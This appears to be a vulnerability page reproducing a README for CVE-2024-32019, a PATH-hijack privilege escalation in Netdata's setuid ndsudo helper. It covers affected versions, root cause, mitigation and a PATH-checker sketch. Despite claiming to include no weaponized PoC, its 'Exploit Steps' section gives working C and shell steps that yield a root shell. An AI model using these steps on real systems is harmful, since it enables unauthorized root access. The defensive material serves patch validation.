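POC details: b9741c6f1f034447e0c514d5c0cdcdc65c65a548

Source
Related vulnerability
Title: Netdata security vulnerability (CVE-2024-32019)
Description: Netdata is a high-fidelity infrastructure monitoring and troubleshooting application open-sourced by Netdata. Netdata contains a security vulnerability. An attacker can exploit this vulnerability to run arbitrary programs with root privileges.
Introduction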
## CVE-2024-32019 — Netdata `ndsudo` Local Privilege Escalation

### Summary

Netdata’s `ndsudo` helper (installed `setuid root`) restricts which commands it will run, but **resolves those commands using the caller’s `PATH`**. In impacted versions, a local user can place a malicious binary earlier in `PATH` and have `ndsudo` execute it with root privileges. **Patched in Netdata 1.45.3 and 1.45.0-169.**

### Affected / Patched

- **Affected:** `>= 1.44.0-60, < 1.45.0-169` and `>= 1.45.0, < 1.45.3` (per upstream advisory).
    
- **Fixed:** `1.45.3` (stable), `1.45.0-169` (nightly). [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
    

### Impact

Local **privilege escalation to root** on systems where `ndsudo` is installed SUID and the user can invoke it (commonly members of the `netdata` group). [NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-32019) [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)

### Root Cause (high-level)

- `ndsudo` is SUID-root and whitelists subcommands like `nvme-list`, `nvme-smart-log`, etc.
    
- It calls external executables by name (e.g., `nvme`), which are resolved via **`PATH`** instead of using absolute paths or a safe, fixed search.
    
- If a writable directory appears before system paths, an attacker can introduce a look-alike binary that gets executed as root. [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
    

### Safe Reproduction / Verification

This repository includes **non-exploit checkers** that:

- Inspect `/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo` (or wherever installed) for SUID/ownership.
    
- Enumerate `PATH` for **writable directories** earlier than common system paths.
    
- Confirm presence of whitelisted subcommand names that `ndsudo` might try to execute.
    
- Optionally run `ndsudo --test <subcommand>` to print the resolved command **without executing it** (use with caution, read code first). [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
    

> ⚠️ **No weaponized PoC** is included. This project is for defenders and researchers to **assess exposure** and **validate patches** responsibly.
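
The first two checks in the list above can be sketched as follows. This is an added example, not the repository's checker scripts (which are not shown on this page); the function names are this example's own, and `nvme` and the `ndsudo` path are taken from this README. It goes one step beyond the list by following the lookup order for one helper name, so an entry is only reported if it is searched no later than the directory that currently provides that helper.

```python
import os
import stat

NDSUDO = "/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo"  # path given in this README


def is_suid_root(path):
    """True if path exists, is owned by uid 0 and carries the setuid bit."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)


def controllable(entry):
    """Reason the current user could place a file via this PATH entry, or None.

    Run as the unprivileged account being assessed; root passes every W_OK check.
    """
    if not os.path.isabs(entry):
        return "empty or relative entry, resolved against the caller's cwd"
    if os.path.isdir(entry):
        return "writable directory" if os.access(entry, os.W_OK) else None
    parent = os.path.dirname(entry.rstrip("/")) or "/"
    if not os.path.exists(entry) and os.path.isdir(parent) and os.access(parent, os.W_OK):
        return "missing directory with a writable parent"
    return None


def risky_path_entries(path_value, helper="nvme"):
    """Controllable entries searched up to and including the one providing `helper`."""
    findings = []
    for entry in path_value.split(os.pathsep):
        reason = controllable(entry)
        if reason:
            findings.append((entry, reason))
        candidate = os.path.join(entry, helper)
        if os.path.isfile(candidate) and os.stat(candidate).st_mode & 0o111:
            break  # lookup stops here; later entries are never consulted
    return findings


if __name__ == "__main__":
    print("ndsudo setuid-root:", is_suid_root(NDSUDO))
    for entry, reason in risky_path_entries(os.environ.get("PATH", "")):
        print(f"PATH entry {entry!r}: {reason}")
```

An empty result on a host where `ndsudo` is setuid-root does not mean the host is patched; the version ranges under "Affected / Patched" remain the authoritative test.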

### Mitigation

- **Upgrade** Netdata to **1.45.3** (stable) or **1.45.0-169** (nightly).
    
- As a defense-in-depth measure, prefer **absolute paths** or sanitized minimal PATH in SUID helpers; avoid granting unnecessary `ndsudo` access. [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93) [wiz.io](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)
    

### Exploit Steps

###### 1. Save the following C code as `nvme.c`:

```C
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
```

###### 2.  Compile the Exploit

```bash
gcc nvme.c -o nvme
```

###### 3.  Environment Set-Up

```bash
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
```

###### 4. Modify the `PATH`

```bash
export PATH=/tmp/fakebin:$PATH
```

###### 5.  Exploit Command

```bash
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```

### References

- NVD: CVE-2024-32019. [NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)
    
- Netdata Advisory (GHSA-pmhq-4cxq-wj93). [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
    
- Wiz summary. [wiz.io](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)
    
- Snyk write-up. [Vulnerability Guide](https://security.snyk.io/vuln/SNYK-UNMANAGED-NETDATANETDATA-6613089)
    
- MITRE/CVE listing. [CVE](https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=netdata)

File snapshot

```
[4.0K] /data/pocs/b9741c6f1f034447e0c514d5c0cdcdc65c65a548
├── [4.0K] checker_c
│   └── [1.4K] cve-2024-32019_check.c
├── [4.0K] checker_python
│   └── [2.7K] cve-2024-32019_check.py
└── [3.7K] README.md

2 directories, 3 files
```